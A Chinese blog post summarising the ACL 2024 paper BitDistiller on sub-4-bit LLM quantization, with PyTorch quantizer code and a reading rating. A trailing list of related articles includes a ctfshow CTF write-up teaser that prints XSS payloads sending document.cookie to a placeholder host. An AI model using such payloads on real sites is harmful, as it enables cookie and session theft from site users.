【大语言模型】ACL2024论文-07 BitDistiller: 释放亚4比特大型语言模型的潜力通过自蒸馏

【大语言模型】ACL2024论文-07 BitDistiller: 释放亚4比特大型语言模型的潜力通过自蒸馏


目录

文章目录

  • 【大语言模型】ACL2024论文-07 BitDistiller: 释放亚4比特大型语言模型的潜力通过自蒸馏
    • 目录
      • 摘要
      • 研究背景
      • 问题与挑战
      • 如何解决
      • 创新点
      • 算法模型
      • 实验效果
      • 代码
      • 推荐阅读指数:✭✭✭✭✩
    • 后记


BitDistiller: 释放亚4比特大型语言模型的潜力通过自蒸馏
在这里插入图片描述

摘要

本文介绍了BitDistiller,这是一个通过结合量化感知训练(QAT)和知识蒸馏(KD)来提升超低精度(亚4比特)大型语言模型(LLMs)性能的框架。BitDistiller首先采用定制的非对称量化和裁剪技术来尽可能保持量化权重的保真度,然后提出了一种新颖的基于置信度的Kullback-Leibler散度(CAKLD)目标,用于自蒸馏,以实现更快的收敛和更优的模型性能。实验评估表明,BitDistiller在3比特和2比特配置下,无论是在通用语言理解还是复杂推理基准测试中,都显著超越了现有方法。值得注意的是,BitDistiller更具成本效益,需要更少的数据和训练资源。

研究背景

随着大型语言模型(LLMs)规模的扩大,自然语言处理领域取得了令人印象深刻的进展。然而,这种模型规模的扩大在部署上带来了显著的挑战,尤其是在资源受限的设备上,因为它们需要大量的内存和计算能力。权重量化作为一种流行的策略,通过减少模型大小来提高LLMs的效率和可访问性,同时最小化性能损失。尽管4比特量化已被广泛采用,提供了显著的压缩比和保留LLM能力之间的平衡,但亚4比特量化会显著降低模型权重的保真度,尤其是在小型模型或需要复杂推理的任务中,导致模型性能恶化。
在这里插入图片描述

问题与挑战

在极端低比特QAT中实现高性能的两个基本挑战是:如何在量化过程中最大限度地保持权重保真度,以及如何在训练中有效学习低比特表示。

如何解决

BitDistiller通过以下方式解决上述挑战:

  1. 非对称量化和裁剪:BitDistiller采用了定制的非对称量化和裁剪策略,以保持全精度模型的能力,特别是在超低比特水平上。
  2. 自蒸馏:BitDistiller利用全精度模型作为教师,低比特模型作为学生,通过自蒸馏方法进行有效的低比特表示学习。
  3. CAKLD目标:BitDistiller创新性地提出了一种基于置信度的Kullback-Leibler散度(CAKLD)目标,优化知识传递效率,实现更快的收敛和增强的模型性能。

创新点

  • 非对称量化和裁剪:BitDistiller针对不同比特级别的量化采用了不同的量化策略,如NF格式和INT格式,以及非对称裁剪,以提高量化权重的表示保真度。
  • CAKLD目标:BitDistiller提出了一种新颖的CAKLD目标,它根据全精度模型对训练数据的置信度自动权衡模式寻求和模式覆盖行为。
  • 自蒸馏框架:BitDistiller将QAT与知识蒸馏相结合,使用全精度模型作为教师来指导低比特学生模型,这是一种简单而有效的自蒸馏方法。
    在这里插入图片描述

算法模型

BitDistiller的框架包括以下几个关键步骤:

  1. 非对称量化和裁剪:在QAT初始化阶段,BitDistiller对权重进行非对称裁剪,以减少量化误差。
  2. 自蒸馏:在训练过程中,全精度模型生成数据,低比特模型学习这些数据,通过CAKLD目标进行优化。
  3. CAKLD目标:CAKLD目标结合了反向KL散度和正向KL散度,根据全精度模型的置信度自动调整模式寻求和模式覆盖行为。
    在这里插入图片描述

实验效果

实验评估表明,BitDistiller在3比特和2比特配置下的性能显著优于现有的PTQ和QAT方法。以下是一些重要的数据和结论:

  • 语言建模任务:在WikiText-2的困惑度(PPL)和MMLU(5-shot)准确性方面,BitDistiller超越了竞争对手。
  • 推理任务:在HumanEval和GSM8K等推理基准测试中,BitDistiller在3比特和2比特量化中均展现出优越性能。
  • 成本效益:BitDistiller需要的训练数据和资源更少,更具成本效益。
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

代码

https://github.com/DD-DuDa/BitDistiller.git
在这里插入图片描述

import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Function
from tqdm import tqdm
import gc
# import bitsandbytes as bnb
import torch.nn as nn
from functools import partial
# import bitsandbytes.functional as bnbF

class Round(Function):
    @staticmethod
    def forward(self, input):
        sign = torch.sign(input)
        output = sign * torch.floor(torch.abs(input) + 0.5)
        return output

    @staticmethod
    def backward(self, grad_output):
        grad_input = grad_output.clone()
        return grad_input

# core quantization method (simulated quantization)
def pseudo_quantize_tensor(w, n_bit=8,
                           zero_point=True, q_group_size=-1,
                           inplace=False,
                           get_scale_zp=False
                           ):
    org_w_shape = w.shape
    if q_group_size > 0:
        assert org_w_shape[-1] % q_group_size == 0
        w = w.reshape(-1, q_group_size)
    elif q_group_size == -1:
        w = w.reshape(-1, w.shape[-1])
    assert w.dim() == 2
    if zero_point:
        max_val = w.amax(dim=1, keepdim=True)
        min_val = w.amin(dim=1, keepdim=True)
        max_int = 2 ** n_bit - 1
        min_int = 0
        scales = (max_val - min_val).clamp(min=1e-5) / max_int
        zeros = (-torch.round(min_val / scales)).clamp_(min_int, max_int)
    else:  # we actually never used this
        assert min_val is None
        max_val = w.abs().amax(dim=1, keepdim=True)
        max_val = max_val.clamp(min=1e-5)
        max_int = 2 ** (n_bit - 1) - 1
        min_int = - 2 ** (n_bit - 1)
        scales = max_val / max_int
        zeros = 0

    assert torch.isnan(scales).sum() == 0
    assert torch.isnan(w).sum() == 0

    if inplace:
        ((w.div_(scales).round_().add_(zeros)).clamp_(
            min_int, max_int).sub_(zeros)).mul_(scales)
    else:
        w = (torch.clamp(torch.round(w / scales) +
                         zeros, min_int, max_int) - zeros) * scales
    assert torch.isnan(w).sum() == 0

    w = w.reshape(org_w_shape)

    if get_scale_zp:
        return w, scales.view(w.shape[0], -1), zeros.view(w.shape[0], -1)
    else:
        return w



@torch.no_grad()
def real_quantize_model_weight(
    model, w_bit, q_config,
    init_only=False
):
    from .qmodule import WQLinear
    from .pre_quant import get_blocks, get_named_linears, set_op_by_name
    assert q_config["zero_point"], "We only support zero_point quantization now."
    
    layers = get_blocks(model)
    for i in tqdm(range(len(layers)), desc="real weight quantization..." + ("(init only)" if init_only else "")):
        layer = layers[i]
        named_linears = get_named_linears(layer)
        # scale_activations(layer)

        for name, module in named_linears.items():
            if init_only:
                q_linear = WQLinear.from_linear(
                    module, w_bit, q_config['q_group_size'], True)
                q_linear.to(next(layer.parameters()).device)
                set_op_by_name(layer, name, q_linear)
            else:
                module.cuda()
                module.weight.data, scales, zeros = pseudo_quantize_tensor(module.weight.data, n_bit=w_bit, get_scale_zp=True, **q_config)
                # scales = scales.t().contiguous()
                # zeros = zeros.t().contiguous()
                q_linear = WQLinear.from_linear(
                    module, w_bit, q_config['q_group_size'], False, scales, zeros)
                module.cpu()
                q_linear.to(next(layer.parameters()).device)
                set_op_by_name(layer, name, q_linear)
                torch.cuda.empty_cache()
                gc.collect()
                
    torch.cuda.empty_cache()
    gc.collect()




def pseudo_quantize_n2f3_tensor(w, q_group_size=-1):
    quantizer = SteN2F3Quantizer(q_group_size=q_group_size)
    w = quantizer(w)
    return w


class SteInt3AsymQuantizer(nn.Module):
    def __init__(self, q_group_size=128):
        super().__init__()
        self.q_group_size = q_group_size
        self.bit = 3
    def forward(self, x):
        org_w_shape = x.shape

        if self.q_group_size > 0:
            assert org_w_shape[-1] % self.q_group_size == 0
            x = x.reshape(-1, self.q_group_size)
        elif self.q_group_size == -1:
            assert org_w_shape[-1] % self.q_group_size == 0
            x = x.reshape(-1, x.shape[-1])
        assert x.dim() == 2

        max_val = x.amax(dim=1, keepdim=True)
        min_val = x.amin(dim=1, keepdim=True)
        max_int = 2 ** self.bit - 1
        min_int = 0
        scales = (max_val - min_val).clamp(min=1e-5) / max_int
        zeros = (-torch.round(min_val / scales)).clamp_(min_int, max_int)

        assert torch.isnan(scales).sum() == 0
        assert torch.isnan(x).sum() == 0

        x = (torch.clamp(Round.apply(x / scales) +
                         zeros, min_int, max_int) - zeros) * scales
        assert torch.isnan(x).sum() == 0

        x = x.reshape(org_w_shape)

        return x

class SteInt2AsymQuantizer(nn.Module):
    def __init__(self, q_group_size=64):
        super().__init__()
        self.q_group_size = q_group_size
        self.bit = 2
    def forward(self, x):
        org_w_shape = x.shape

        if self.q_group_size > 0:
            assert org_w_shape[-1] % self.q_group_size == 0
            x = x.reshape(-1, self.q_group_size)
        assert x.dim() == 2

        max_val = x.amax(dim=1, keepdim=True)
        min_val = x.amin(dim=1, keepdim=True)
        max_int = 2 ** self.bit - 1
        min_int = 0
        scales = (max_val - min_val).clamp(min=1e-5) / max_int
        zeros = (-torch.round(min_val / scales)).clamp_(min_int, max_int)

        assert torch.isnan(scales).sum() == 0
        assert torch.isnan(x).sum() == 0

        x = (torch.clamp(Round.apply(x / scales) +
                         zeros, min_int, max_int) - zeros) * scales
        assert torch.isnan(x).sum() == 0

        x = x.reshape(org_w_shape)

        return x

class SteN2F3Quantizer(nn.Module):
    def __init__(self, q_group_size=128):
        super().__init__()
        self.q_group_size = q_group_size
    
    def forward(self, x):
        org_w_shape = x.shape

        # reshape to groupsize
        if self.q_group_size > 0:
            assert org_w_shape[-1] % self.q_group_size == 0
            qx = x.reshape(-1, self.q_group_size)
        elif self.q_group_size == -1:
            qx = x.reshape(-1, x.shape[-1])
        assert qx.dim() == 2

        # Get the Min Max
        max_val = qx.amax(dim=1, keepdim=True)
        min_val = qx.amin(dim=1, keepdim=True)

        
        scale_pos = torch.abs(max_val)
        scale_neg = torch.abs(min_val)

        dev = qx.device
        x_pos = torch.zeros_like(qx)
        x_neg = torch.zeros_like(qx)
        x_pos = torch.where(qx >= 0, qx, x_pos)
        x_neg = torch.where(qx < 0, qx, x_neg)
        q_pos = x_pos / scale_pos
        q_neg = x_neg / scale_neg

        q_pos, q_neg = self.round_pass(q_pos, q_neg, dev)

        qx = q_pos * scale_pos + q_neg * scale_neg

        qx = qx.reshape(org_w_shape)

        return qx
    
    def round_n2f3(self, q_pos, q_neg, dev):
        q_pos = torch.where(q_pos >= 0.8114928305149078,                                        torch.tensor(1.0).to(dev), q_pos)
        q_pos = torch.where((q_pos < 0.8114928305149078)    & (q_pos >= 0.5024898052215576),    torch.tensor(0.6229856610298157).to(dev), q_pos)
        q_pos = torch.where((q_pos < 0.5024898052215576)    & (q_pos >= 0.2826657369732857),    torch.tensor(0.3819939494132996).to(dev), q_pos)
        q_pos = torch.where((q_pos < 0.2826657369732857)    & (q_pos >= 0.0916687622666359),    torch.tensor(0.1833375245332718).to(dev), q_pos)
        q_pos = torch.where(q_pos < 0.0916687622666359,                                        torch.tensor(0).to(dev), q_pos)

        q_neg = torch.where(q_neg >= -0.1234657019376755,                                     torch.tensor(0).to(dev), q_neg)
        q_neg = torch.where((q_neg < -0.1234657019376755)   & (q_neg >= -0.39097706973552704),   torch.tensor(-0.2469314038753510).to(dev), q_neg)
        q_neg = torch.where((q_neg < -0.39097706973552704)   & (q_neg >= -0.7675113677978516),   torch.tensor(-0.5350227355957031).to(dev), q_neg)
        q_neg = torch.where(q_neg < -0.7675113677978516,                                        torch.tensor(-1.0).to(dev), q_neg)

        return q_pos, q_neg

    def round_pass(self, q_pos, q_neg, dev):
        y_grad_pos, y_grad_neg = q_pos, q_neg
        y_pos, y_neg = self.round_n2f3(q_pos, q_neg, dev)
        
        return (y_pos - y_grad_pos).detach() + y_grad_pos, (y_neg - y_grad_neg).detach() + y_grad_neg

推荐阅读指数:✭✭✭✭✩

推荐理由

  • 创新性:BitDistiller通过结合QAT和KD,在亚4比特量化领域提供了一种新的解决方案,具有显著的性能提升。
  • 实用性:BitDistiller不仅在理论上具有创新性,而且在实际应用中也显示出了成本效益,这对于资源受限的设备尤为重要。
  • 广泛适用性:BitDistiller在多种语言和推理任务中都展现出了优越的性能,表明其方法的广泛适用性。

后记

如果您对我的博客内容感兴趣,欢迎三连击(点赞、收藏、关注和评论),我将持续为您带来计算机人工智能前沿技术(尤其是AI相关的大语言模型,深度学习和计算机视觉相关方向)最新学术论文及工程实践方面的内容分享,助力您更快更准更系统地了解 AI前沿技术

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/911520.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

积分赛3(D一血题解)

题目&#xff1a; 思路&#xff1a; 找到从起点开始&#xff0c;高度严格单调递增的最大值 代码&#xff1a; #include <iostream>using namespace std;int main () {int n;cin>>n;int mx0;for(int i0; i<n; i){int x;cin>>x;if(x>mx) mxx;else bre…

我谈维纳(Wiener)去噪滤波器

Rafael Gonzalez的《数字图像处理》中&#xff0c;图像复原这章内容几乎全错。本篇只说去噪的问题。 关于图像去噪的滤波器&#xff0c;不考虑降质过程的滤波都不是逆问题。 Gonzalez将自适应中值滤波和自适应局部降噪滤波归并为自适应图像去噪滤波器。尽管它们都是滤波器&…

计算机网络:网络层 —— 多播路由选择协议

文章目录 多播路由选择协议多播转发树构建多播转发树基于源树的多播路由选择建立广播转发树建立多播转发树 组共享树的多播路由选择基于核心的生成树的建立过程 因特网的多播路由选择协议 多播路由选择协议 仅使用 IGMP 并不能在因特网上进行IP多播。连接在局域网上的多播路由…

vscode ssh连接autodl失败

autodl服务器已开启&#xff0c;vscode弹窗显示连接失败 0. 检查状态 这里的端口和主机根据自己的连接更改 ssh -p 52165 rootregion-45.autodl.pro1. 修改config权限 按返回的路径找到config文件 右键--属性--安全--高级--禁用继承--从此对象中删除所有已继承的权限--添加…

阿里云-部署CNI flannel集群网络

环境 1.一台阿里云作为k8s-master:8.130.XXX.231&#xff08;阿里云私有IP&#xff09; 2.Vmware 两个虚拟机分别作为 k8s-node1:192.168.40.131 k8s-node2:192.168.40.131 3.安装Docker 部署过程 k8s-master,k8s-node1,k8s-node2 初始操作 # 关闭防火墙 systemctl stop fi…

CentOS 7 软件/程序安装示例

安装软件/程序 wget&#xff0c;前提需要用 root 用户 1、搜索软件/程序 yum search wget 搜索到软件/程序。 2、安装软件/程序 yum -y install wget 安装完成。 ---------------------------------------------------------------------------------------------------…

[HCTF 2018]WarmUp 1--详细解析

打开靶机&#xff0c;进入界面&#xff1a; 信息搜集 当前界面没有任何有用信息。 想到查看页面源代码。右键–查看页面源代码 看到hint&#xff1a;<!--source.php--> 进入/source.php页面&#xff0c;看到页面源代码&#xff1a; <?phphighlight_file(__FILE_…

Python的函数

一、定义 函数的定义&#xff1a;实现【特定功能】的代码块。 形参&#xff1a;函数定义时的参数&#xff0c;没有实际意义 实参&#xff1a;函数调用/使用时的参数&#xff0c;有实际意义 函数的作用&#xff1a; 简化代码提高代码重用性便于维护和修改提高代码的可扩展性…

ctfshow(319->326)--XSS漏洞--反射型XSS

Web319 思路 先测试过滤&#xff0c;发现过滤了script、img&#xff0c;没有过滤body&#xff0c;svg payload: <body onload"location.hrefhttp://xx.xx.xx.xx/flag.php?cookiedocument.cookie"/><svg onload"location.hrefhttp://xx.xx.xx.xx/fla…

MySQL server 免安装教程

1&#xff0c;下载免安装包-社区版本 https://dev.mysql.com/downloads/file/?id534320 2&#xff0c;解压 放到一电脑某个路径下&#xff0c;整个包 3&#xff0c;创建data 文件夹和my.ini文件 my.ini代码照抄&#xff0c;注意修改路径&#xff0c;与解压后的安装包地址一…

使用ookii-dialogs-wpf在WPF选择文件夹时能输入路径

在进行WPF开发时&#xff0c;System.Windows.Forms.FolderBrowserDialog的选择文件夹功能不支持输入路径&#xff1a; 希望能够获得下图所示的选择文件夹功能&#xff1a; 于是&#xff0c;通过NuGet中安装Ookii.Dialogs.Wpf包&#xff0c;并创建一个简单的工具类&#xff1a; …

Java项目实战II基于Spring Boot的便利店信息管理系统(开发文档+数据库+源码)

目录 一、前言 二、技术介绍 三、系统实现 四、文档参考 五、核心代码 六、源码获取 全栈码农以及毕业设计实战开发&#xff0c;CSDN平台Java领域新星创作者&#xff0c;专注于大学生项目实战开发、讲解和毕业答疑辅导。获取源码联系方式请查看文末 一、前言 在快节奏的…

SpringBoot整合Liquibase对数据库管理和迁移

简介 Liquibase是一个用于用于跟踪、管理和应用数据库变化的开源工具&#xff0c;通过日志文件(changelog)的形式记录数据库的变更(changeset)&#xff0c;然后执行日志文件中的修改&#xff0c;将数据库更新或回滚(rollback)到一致的状态。它的目标是提供一种数据库类型无关的…

练习LabVIEW第四十三题

学习目标&#xff1a; 模拟红绿灯&#xff0c;红灯亮十秒&#xff0c;绿灯亮五秒&#xff0c;交替&#xff0c;并用波形图将波形显示 开始编写&#xff1a; 前面板 两个指示灯&#xff0c;一个红色&#xff0c;一个绿色&#xff0c;一个波形图&#xff1b; 程序框图 创建…

针对解决前后端BUG的个人笔记

1-IDEA Q&#xff1a;Required Java version 17 is not supported by SDK 1.8. The maximum supported Java version is 8. A: 我们只知道IDEA页面创建Spring项目&#xff0c;其实是访问spring initializr去创建项目。故我们可以通过阿里云国服去间接创建Spring项目。将https…

ElasticSearch 添加IK分词器

ElasticSearch 添加IK分词器 前言一、IK分词器的算法二、Ik分词器的下载安装&#xff08;Winows 版本&#xff09;三、Ik分词器的下载安装&#xff08;Linux 版本&#xff09;四、验证测试&#xff08;postman工具&#xff09;测试 ik_smart 分词算法测试 ik_max_word 分词算法…

Android关机流程知多少?

在 Android 中&#xff0c;关机流程涉及系统各个组件的协同工作&#xff0c;确保设备在断电之前能够安全地关闭所有活动并保存数据。以下是 Android 系统中关机流程的详细介绍&#xff1a; 1. 用户触发关机请求 关机流程由用户的操作触发&#xff0c;通常有以下几种方式&#…

Golang | Leetcode Golang题解之第542题01矩阵

题目&#xff1a; 题解&#xff1a; type point struct{x, y int }var dirs []point{{-1, 0}, {1, 0}, {0, -1}, {0, 1}}func updateMatrix(mat [][]int) [][]int {var m, n len(mat), len(mat[0])var res make([][]int, m)var visited make([][]bool, m)var queue []poin…

基于ssm的小区物业管理系统

项目描述 临近学期结束&#xff0c;还是毕业设计&#xff0c;你还在做java程序网络编程&#xff0c;期末作业&#xff0c;老师的作业要求觉得大了吗?不知道毕业设计该怎么办?网页功能的数量是否太多?没有合适的类型或系统?等等。这里根据疫情当下&#xff0c;你想解决的问…

_处理匿名命名空间里的变量时进入硬件中断错误

最近在初次使用匿名空间时出现一个很离谱的错误&#xff0c;我先简单描述一下情形&#xff1a;在匿名命名空间里有一个变量&#xff08;全局&#xff09;&#xff0c;在命名空间外&#xff0c;有一个内联函数操作该空间内的变量。 如果开优化&#xff0c;那么程序就会进入硬件错…